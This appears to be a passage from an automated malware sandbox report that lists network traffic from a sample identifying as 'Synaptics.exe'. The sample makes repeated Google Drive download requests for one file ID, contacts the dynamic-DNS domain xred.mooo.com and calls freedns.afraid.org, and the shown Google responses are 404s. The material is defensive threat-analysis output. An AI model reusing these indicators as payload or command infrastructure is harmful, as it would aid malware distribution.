                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5NjZUDpzwGZ-E764jvD7gqnznCYxkn8gCFgiob_B6Ou7P6LRXS_uat4TkQVgLcIIeiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d6BqksB8bJk21Leg9h3EQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk; expires=Tue, 01-Jul-2025 10:40:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62M3jCQXortMmokBrUGlmUrsZKeo07pK8TwJB3waK_8GFoyabIjZXWvr6RqUF9Dr-fxIIkGhwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--WplRxNcX56DZt7mI1z9dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-; expires=Tue, 01-Jul-2025 10:40:39 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Rml3YnEOq65rDZjkua5UqhaROy1ATmupOuW1IFeKsAp_f2ugh5JJlr0nP00wV8mFmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:40 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-aAJppFj6bCC4l6Zf1EC6yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7; expires=Tue, 01-Jul-2025 10:40:40 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78uzettXvUXXFIJixkANh297TWjhG6OYsKypmDUqXiVOn_rOyo--t_-VaUr9nybv1VContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-EfxtQkcdyGYydNKYbQeA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7xEof4pDMmkxt_skBhEHWxQjELhKVQKgpdujZDIBk3nTAlTM0QS8DIBG8ZZ3b2QDJjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-f52LIjg0UGkvyMRF-ahcfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC76cqJ3W25Jf1booRyStDEV_5AI1mbZPmTsBrO-1sHDjuqS0ngSxnD17p6MmIa8_j_YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2H8NIJIPIxxXHn2Uold6fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XqTKpAo8Mf7zqzLQYBwoBraZhle8kX_FUVcvq5PTSxbxoyIY9LtffNnk5hHN_N7v9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:43 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uAzPdoq_joE27Lj2D-nmdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6m3OBeC9iOe3ClVYOpwg_Fa6toqdSbJjE_AO1Bn9V1d79laz448qBqUopzjWZprPzgPihTV1YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-9sP9v-uIb4I-kf1aiYy1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5va-gYexViE6-FtIzOZPQ2BNpD1s3RTWRfark6q3muu_XGaDNDpoLmoAn5x3HlxHIQISUXRiwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:45 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Pm3g7F377XXyk0ZJsPa0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5lDUluWjpr3icEoJTIspjwaL921ropBmxiIdkDPQyJQZ9eVefFMw8gZJWCnaZA4loNWgmrtLUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zH9V_vV7xkUPDx2Cv6nqrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ZJCzwavFvV_jXkamolU4IcoO7y94mslB5IkprvD56BsXczWtSZpis6lfxTOSooCBSP3DrYIUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-yH-Ss2849tMJ2ye23x4UlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ECm1TxO9_Y_R_zeUMUtx_dEWqKdl9Je9KGTkZKb23w7txD3jRMlS8buy3OaPFGUepContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_YhG6DZjERxiMrIanbQBxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
